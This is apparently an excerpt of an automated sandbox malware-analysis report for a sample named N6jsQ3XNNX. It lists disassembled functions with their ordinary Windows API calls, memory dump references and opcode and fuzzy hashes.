                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLibraryLoadMode
                                                                                • String ID:
                                                                                • API String ID: 2987862817-0
                                                                                • Opcode ID: 7795cc8daa252176d65de3d8f3118caac988bfa791d53a68a28aad838e50b78c
                                                                                • Instruction ID: 98bcbcc3e9aaf4c66058534b39987ccdd7eb12bd14468eaf88ad72af9e5505e3
                                                                                • Opcode Fuzzy Hash: 7795cc8daa252176d65de3d8f3118caac988bfa791d53a68a28aad838e50b78c
                                                                                • Instruction Fuzzy Hash: D5F05E70A14744BEDF119F779C6282ABAACE749B1179248B6F810A3691E67D48108928
                                                                                Function 004162DA Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
                                                                                • GetClassInfoA.USER32(00000000,?,?), ref: 00416301
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ClassInfo
                                                                                • String ID:
                                                                                • API String ID: 3534257612-0
                                                                                • Opcode ID: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                                                • Instruction ID: dc9e2acc6f173dd0cc3aa24d84b637cb0067f0ccc6b7cec6a0fcec59befe77f5
                                                                                • Opcode Fuzzy Hash: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                                                • Instruction Fuzzy Hash: 22E012B26015155ADB10DB999D81EE326DCDB09310B110167BE14CA246D764DD005BA4
                                                                                Function 004508E4 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,004703F1,?,00000000), ref: 004508FA
                                                                                • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,004703F1,?,00000000), ref: 00450902
                                                                                  • Part of subcall function 004506A0: GetLastError.KERNEL32(004504BC,00450762,?,00000000,?,004977FC,00000001,00000000,00000002,00000000,0049795D,?,?,00000005,00000000,00497991), ref: 004506A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                • Opcode ID: 740b0e3b535324eeb3a184350110131e2b1ae31ce216053ff26069d2cbf9fe72
                                                                                • Instruction ID: a22a311b57bf1dff13f45894218d9c0eaf9de3d8271a2984ee0ce7717fd7efee
                                                                                • Opcode Fuzzy Hash: 740b0e3b535324eeb3a184350110131e2b1ae31ce216053ff26069d2cbf9fe72
                                                                                • Instruction Fuzzy Hash: E0E012B53042059BFB00FA6599C1F3B63DCDB44315F00447AB984CF187D674CC155B29
                                                                                Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 2087232378-0
                                                                                • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                Function 004085E4 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                                                  • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
                                                                                  • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                • String ID:
                                                                                • API String ID: 1658689577-0
                                                                                • Opcode ID: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
                                                                                • Instruction ID: ea6634d2ed8774f5e90a5a6f355d63bed973dafba18e0ec7d48b30ffe24ea089
                                                                                • Opcode Fuzzy Hash: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
                                                                                • Instruction Fuzzy Hash: C4314375E001199BCF01DF95C8819EEB7B9FF84314F15857BE815AB286E738AE018B98
                                                                                Function 0041FBAC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: InfoScroll
                                                                                • String ID:
                                                                                • API String ID: 629608716-0
                                                                                • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                                • Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
                                                                                • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                                • Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                                                Function 0046C6F8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                  • Part of subcall function 0041EEB4: 73EA5940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                                • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C756,?,00000000,?,?,0046C968,?,00000000,0046C9DC), ref: 0046C73A
                                                                                  • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                                                  • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$A5940CurrentEnablePathPrepareThreadWrite
                                                                                • String ID:
                                                                                • API String ID: 3104224314-0
                                                                                • Opcode ID: 7310e4a240e1736cfb30b9abd7a9c8d32e29debdd45fb2130da0edd2c14fc99c
                                                                                • Instruction ID: 552ca42e7a4f22222615ff1de8f8c20df724e6475abae56b3c63f202feb1ec23
                                                                                • Opcode Fuzzy Hash: 7310e4a240e1736cfb30b9abd7a9c8d32e29debdd45fb2130da0edd2c14fc99c
                                                                                • Instruction Fuzzy Hash: 28F0E270248300FFEB059BB2EDD6B2577E8E319716F91043BF504866D0EA795D40C96E
                                                                                Function 004413A4 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                • Instruction ID: d0e136ad155d69288fc423feb27b218c22c44688115b59a91c3ffefc647f2292
                                                                                • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                • Instruction Fuzzy Hash: F0F0FF70509209DBBB1CCF54D0919AF7B71EB59310F20806FE907877A0D6346A80D759
                                                                                Function 00416560 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                • Instruction ID: 39ad6e161323637dbb8254467e02d50acedd081d31d6b9d15e1adfc5f54150e8
                                                                                • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                • Instruction Fuzzy Hash: 6EF02BB2200510AFDB84CF9CD9C0F9373ECEB0C210B0481A6FA08CF24AD220EC108BB0
                                                                                Function 004149C4 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                Function 004507B0 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 838f498b19bb2aafec3be0ee987651bf511c4e6d2f63907cf4f88042037e4973
                                                                                • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                • Opcode Fuzzy Hash: 838f498b19bb2aafec3be0ee987651bf511c4e6d2f63907cf4f88042037e4973
                                                                                • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                Function 0042CCDC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD24,?,00000001,?,?,00000000,?,0042CD76,00000000,00452A11,00000000,00452A32,?,00000000), ref: 0042CD07
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: a570e9d0cc49cd9ea48ac8d9958fbde071fca7bece3969a5989dcb135d147aed
                                                                                • Instruction ID: bebe06870d533199fa05ec681e6f815a7bc371a3e359dcca221b2f893a48d47d
                                                                                • Opcode Fuzzy Hash: a570e9d0cc49cd9ea48ac8d9958fbde071fca7bece3969a5989dcb135d147aed
                                                                                • Instruction Fuzzy Hash: 0AE06571304308BFD701EB62EC92A5EBBECD749714B914476B400D7592D5B86E008458
                                                                                Function 0042E8D8 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FormatMessage
                                                                                • String ID:
                                                                                • API String ID: 1306739567-0
                                                                                • Opcode ID: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                                                • Instruction ID: 1e04b5e42f682bd3307758a00633d1e15c64123c11c882a5e2d093d9edca25ee
                                                                                • Opcode Fuzzy Hash: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                                                • Instruction Fuzzy Hash: E7E0D86178432126F23524166C43B7B110E43C0704FD080267A809F3D6D6EE9949425E
                                                                                Function 00406300 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                                • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                                Function 0042DDF4 Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: b59592ccec0b1853c0d50eb209755673f49d30f0d63234ebc8c06611609486a1
                                                                                • Instruction ID: 00bf656f3cc58d957e3fc120c7d975a7f6f089e768df8f95d2ce2a55afbcf34e
                                                                                • Opcode Fuzzy Hash: b59592ccec0b1853c0d50eb209755673f49d30f0d63234ebc8c06611609486a1
                                                                                • Instruction Fuzzy Hash: 69E07EB2600119AF9B40DE8CDC81EEB37ADAB1D350F414016FA08E7200C274EC519BB4
                                                                                Function 00454BE4 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindClose.KERNEL32(00000000,000000FF,00470C14,00000000,00471A10,?,00000000,00471A59,?,00000000,00471B92,?,00000000,?,00000000), ref: 00454BFA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFind
                                                                                • String ID:
                                                                                • API String ID: 1863332320-0
                                                                                • Opcode ID: cdb9c2b7633e0d7853738bb459b1a46babdaf032508dd36dba6af5da7df12373
                                                                                • Instruction ID: 3c3cb6916585ff7422749358fc170cdffb6a73b651657da6609ae8be1e4b77d0
                                                                                • Opcode Fuzzy Hash: cdb9c2b7633e0d7853738bb459b1a46babdaf032508dd36dba6af5da7df12373
                                                                                • Instruction Fuzzy Hash: A7E065B0A056004BCB15DF3A858021A76D25FC5325F05C96AAC58CF397D63C84955656
                                                                                Function 0041468C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(004953B6,?,004953D8,?,?,00000000,004953B6,?,?), ref: 004146AB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
